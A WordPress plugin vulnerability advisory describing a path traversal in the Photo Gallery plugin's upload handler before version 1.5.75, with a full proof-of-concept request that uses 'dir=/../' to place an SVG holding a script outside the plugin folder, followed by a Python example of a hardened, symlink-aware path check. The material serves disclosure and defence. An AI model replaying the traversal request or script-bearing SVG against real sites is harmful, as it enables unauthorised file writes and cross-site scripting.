WordPress Plugin Vulnerabilities

Photo Gallery < 1.5.75 - File Upload Path Traversal

Description

The plugin did not ensure that uploaded files are kept inside its uploads folder, allowing high-privilege users to write images/SVG files anywhere in the filesystem via a path traversal vector in the upload directory parameter.

Proof of Concept

The request below will put the xss.svg file into the /wp-content/uploads/ folder rather than the plugin's own /wp-content/uploads/photo-gallery/ folder, because the `dir=/../` query parameter is joined onto the upload path without being checked.

POST /wp-admin/admin-ajax.php?bwg_nonce=4ef81877b0&action=bwg_UploadHandler&dir=/../ HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------61502566032120876251044562165
Content-Length: 1841
Connection: close
Cookie: [high privilege user, such as admin]

-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="bwg_nonce"

d0b8d99404
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="upload_thumb_width"

500
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="upload_thumb_height"

500
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="upload_img_width"

1200
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="upload_img_height"

1200
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="extensions"

jpg,jpeg,png,gif,svg
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="callback"

bwg_add_image
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="sort_by"

date_modified
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="sort_order"

desc
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="items_view"

thumbs
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="files[]"; filename="xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
	<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
	<script type="text/javascript">alert(document.domain);</script>
</svg>

-----------------------------61502566032120876251044562165--
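The defect the advisory describes is a directory parameter concatenated onto the uploads path with no containment check. The following example is added here and is not the plugin's code (the plugin is PHP; this Python reproduces the same logic for illustration). It contrasts the vulnerable concatenation with a hardened version that canonicalises the path and requires the result to stay under the uploads folder, and adds an on-disk, symlink-aware check that the purely lexical test cannot provide. The base directory, album names and filenames are constructed values.

```python
import os
import posixpath
import tempfile
from urllib.parse import unquote

# Constructed base directory; the advisory names wp-content/uploads/photo-gallery/
# as the folder the plugin should have confined uploads to.
UPLOADS_BASE = "/var/www/html/wp-content/uploads/photo-gallery"


def naive_target(base, user_dir, filename):
    """Vulnerable pattern: trust the request's dir parameter and concatenate.

    With dir=/../ the normalised result lands one level above the plugin
    folder, which is exactly the behaviour the advisory describes.
    """
    return posixpath.normpath(base + "/" + unquote(user_dir) + "/" + filename)


def safe_target(base, user_dir, filename):
    """Hardened pattern: canonicalise, then require the result to stay under base.

    Raises ValueError for any filename or directory component that would
    escape the uploads folder. This check is purely lexical; see
    resolved_in_base() for the symlink-aware on-disk check.
    """
    base_norm = posixpath.normpath(base)
    # Reject filenames that carry their own directory components.
    if not filename or "/" in filename or filename in (".", ".."):
        raise ValueError("invalid filename: %r" % filename)
    # Decode once (the parameter arrives URL-encoded) and strip a leading slash
    # so that posixpath.join cannot be talked into discarding base.
    sub_dir = unquote(user_dir).lstrip("/")
    candidate = posixpath.normpath(posixpath.join(base_norm, sub_dir, filename))
    if not candidate.startswith(base_norm + "/"):
        raise ValueError("path escapes uploads directory: %r" % candidate)
    return candidate


def resolved_in_base(base, candidate):
    """On-disk check: resolve symlinks in the candidate's parent directory and
    confirm it still lies inside the (resolved) base directory."""
    real_base = os.path.realpath(base)
    real_parent = os.path.realpath(os.path.dirname(candidate))
    return real_parent == real_base or real_parent.startswith(real_base + os.sep)


def demo_symlink_escape():
    """Build a throwaway tree in which an album directory is a symlink pointing
    outside the uploads folder, to show why the lexical check alone is not enough.
    Returns (lexical_check_passed, resolved_check_passed)."""
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "uploads", "photo-gallery")
        outside = os.path.join(root, "outside")
        os.makedirs(base)
        os.makedirs(outside)
        os.symlink(outside, os.path.join(base, "album-link"))
        candidate = safe_target(base, "album-link", "x.svg")  # passes lexically
        return True, resolved_in_base(base, candidate)


if __name__ == "__main__":
    print("naive:", naive_target(UPLOADS_BASE, "/../", "xss.svg"))
    for user_dir in ("album1", "/../", "%2F..%2F"):
        try:
            print("safe :", safe_target(UPLOADS_BASE, user_dir, "xss.svg"))
        except ValueError as exc:
            print("safe : rejected ->", exc)
    print("symlink demo (lexical, resolved):", demo_symlink_escape())
```

Both checks are needed together: `safe_target` stops `dir=/../` and its URL-encoded forms before anything touches the disk, while `resolved_in_base` catches a pre-existing symlink inside the uploads tree that a lexical check cannot see. Independently of where the file lands, an SVG containing a `<script>` element, as in the PoC above, is executable content if it is ever served inline, so restricting the accepted extensions or sanitising SVG on upload is a separate control from the path check.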

Affects Plugins

Fixed in 1.5.75

References

Classification

Type
TRAVERSAL
OWASP top 10
CWE
CVSS

Miscellaneous

Original Researcher
avolume
Verified
Yes

Timeline

Publicly Published
2021-07-18 (about 2 years ago)
Added
2021-07-19 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)
